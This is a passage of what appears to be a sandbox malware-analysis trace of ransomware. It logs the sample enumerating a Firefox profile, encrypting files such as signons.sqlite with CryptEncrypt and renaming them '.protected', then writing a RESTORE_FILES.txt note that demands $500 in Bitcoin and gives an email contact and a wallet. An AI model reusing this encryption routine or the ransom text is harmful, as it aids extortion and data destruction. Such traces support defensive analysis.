out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xbc5, lpOverlapped=0x0) returned 1 [0090.987] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.987] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.987] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.987] CloseHandle (hObject=0x154) returned 1 [0090.988] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.protected") returned 117 [0090.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.protected")) returned 1 [0090.988] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="Windows") returned -1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="Program Files") returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="Program Files (x86)") returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="$Recycle.bin") returned 1 [0090.988] lstrcmpiW (lpString1="signons.sqlite", lpString2="System Volume Information") returned -1 [0090.988] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.988] StrStrIW (lpFirst="signons.sqlite", lpSrch=".protected") returned 0x0 [0090.988] lstrcmpW (lpString1="signons.sqlite", lpString2="RESTORE_FILES.txt") returned 1 [0090.989] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.989] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.989] StrStrW (lpFirst="signons.sqlite", lpSrch=".txt") returned 0x0 [0090.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.989] StrStrW (lpFirst="signons.sqlite", lpSrch=".rar") returned 0x0 [0090.989] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0090.989] StrStrW (lpFirst="signons.sqlite", lpSrch=".zip") returned 0x0 [0090.989] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.003] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.004] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.004] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.004] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0091.004] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0091.005] CloseHandle (hObject=0x154) returned 1 [0091.005] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.protected") returned 116 [0091.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.protected")) returned 1 [0091.006] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="Windows") returned -1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="Program Files") returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="Program Files (x86)") returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="$Recycle.bin") returned 1 [0091.006] lstrcmpiW (lpString1="times.json", lpString2="System Volume Information") returned 1 [0091.006] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.006] StrStrIW (lpFirst="times.json", lpSrch=".protected") returned 0x0 [0091.006] lstrcmpW (lpString1="times.json", lpString2="RESTORE_FILES.txt") returned 1 [0091.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0091.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0091.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0091.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.007] StrStrW (lpFirst="times.json", lpSrch=".txt") returned 0x0 [0091.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.007] StrStrW (lpFirst="times.json", lpSrch=".rar") returned 0x0 [0091.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0091.007] StrStrW (lpFirst="times.json", lpSrch=".zip") returned 0x0 [0091.007] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x1d, lpOverlapped=0x0) returned 1 [0091.008] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.008] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x1d, lpOverlapped=0x0) returned 1 [0091.008] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.008] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0091.008] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0091.008] CloseHandle (hObject=0x154) returned 1 [0091.008] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.protected") returned 112 [0091.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.protected")) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="Windows") returned -1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="Program Files") returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="Program Files (x86)") returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="$Recycle.bin") returned 1 [0091.009] lstrcmpiW (lpString1="webapps", lpString2="System Volume Information") returned 1 [0091.009] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 99 [0091.009] lstrcmpW (lpString1="webapps", lpString2=".") returned 1 [0091.009] lstrcmpW (lpString1="webapps", lpString2="..") returned 1 [0091.009] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*") returned 101 [0091.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0091.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.010] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\.") returned 101 [0091.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.010] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0091.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.010] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.010] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\..") returned 102 [0091.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.010] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="Windows") returned -1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="Program Files") returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="Program Files (x86)") returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="$Recycle.bin") returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="System Volume Information") returned 1 [0091.010] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.010] StrStrIW (lpFirst="webapps.json", lpSrch=".protected") returned 0x0 [0091.010] lstrcmpW (lpString1="webapps.json", lpString2="RESTORE_FILES.txt") returned 1 [0091.010] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0091.010] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0091.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0091.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.011] StrStrW (lpFirst="webapps.json", lpSrch=".txt") returned 0x0 [0091.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.011] StrStrW (lpFirst="webapps.json", lpSrch=".rar") returned 0x0 [0091.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.011] StrStrW (lpFirst="webapps.json", lpSrch=".zip") returned 0x0 [0091.011] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x2, lpOverlapped=0x0) returned 1 [0091.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.012] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x2, lpOverlapped=0x0) returned 1 [0091.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.012] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0091.012] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0091.012] CloseHandle (hObject=0x158) returned 1 [0091.012] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.protected") returned 122 [0091.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.protected")) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0091.013] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0091.013] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\RESTORE_FILES.txt") returned 117 [0091.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0091.013] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.013] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0091.014] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.014] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.014] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.014] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0091.014] CloseHandle (hObject=0x154) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Windows") returned -1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Program Files") returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Program Files (x86)") returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="$Recycle.bin") returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="System Volume Information") returned 1 [0091.014] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.014] StrStrIW (lpFirst="webappsstore.sqlite", lpSrch=".protected") returned 0x0 [0091.014] lstrcmpW (lpString1="webappsstore.sqlite", lpString2="RESTORE_FILES.txt") returned 1 [0091.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0091.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0091.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0091.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.015] StrStrW (lpFirst="webappsstore.sqlite", lpSrch=".txt") returned 0x0 [0091.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.015] StrStrW (lpFirst="webappsstore.sqlite", lpSrch=".rar") returned 0x0 [0091.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.015] StrStrW (lpFirst="webappsstore.sqlite", lpSrch=".zip") returned 0x0 [0091.015] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.027] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.027] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: 